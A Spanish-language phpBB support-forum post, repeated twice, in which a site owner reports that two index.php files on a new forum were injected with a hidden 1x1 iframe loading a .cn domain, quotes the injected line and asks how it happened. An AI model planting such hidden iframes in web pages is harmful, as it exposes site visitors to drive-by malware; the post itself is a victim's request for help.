INYECCIÓN CÓDIGO EN INDEX.PHP
Publicado: 09 Ene 2009, 09:17
URL: http://piperrak.org/public/foro" onclick="window.open(this.href);return false;
Versión phpBB: phpBB3 (3.0.4)
MODs Instalados: Ninguno
Plantilla(s) usada(s): Black_Pearl
Servidor: Windows (de pago) - aruba.it
Actualización desde otra versión: No
Conversión desde otro sistema de foros: No
Buenas maestros,
estoy muy preocupado ya que ayer mismo terminé de instalar y configurar mi flamante nuevo foro phpbb 3.0.4 y esta mañana cuando he ido a visitarlo el navegador decía algo así como que faltaba un ? de cierre en index.php!!!
Cuál ha sido mi sorpresa cuando he comprobado que me han inyectado código en estos dos archivos:
/index.php
/includes/hooks/index.php
El código que han inyectado es un frame de publicidad:
?<html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola8" width=1 height=1 style="visibility: hidden"></iframe></body></html>>
Me preocupa muchísimo cómo lo han hecho. Me imagino que algo se me escapa o que quizá no haya terminado de cerrar los agujeros de seguridad. Los permisos de todas las carpetas del foro son 666 (¿Es correcto?)
Alguna idea de cómo lo han hecho?
Versión phpBB: phpBB3 (3.0.4)
MODs Instalados: Ninguno
Plantilla(s) usada(s): Black_Pearl
Servidor: Windows (de pago) - aruba.it
Actualización desde otra versión: No
Conversión desde otro sistema de foros: No
Buenas maestros,
estoy muy preocupado ya que ayer mismo terminé de instalar y configurar mi flamante nuevo foro phpbb 3.0.4 y esta mañana cuando he ido a visitarlo el navegador decía algo así como que faltaba un ? de cierre en index.php!!!
Cuál ha sido mi sorpresa cuando he comprobado que me han inyectado código en estos dos archivos:
/index.php
/includes/hooks/index.php
El código que han inyectado es un frame de publicidad:
?<html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola8" width=1 height=1 style="visibility: hidden"></iframe></body></html>>
Me preocupa muchísimo cómo lo han hecho. Me imagino que algo se me escapa o que quizá no haya terminado de cerrar los agujeros de seguridad. Los permisos de todas las carpetas del foro son 666 (¿Es correcto?)
Alguna idea de cómo lo han hecho?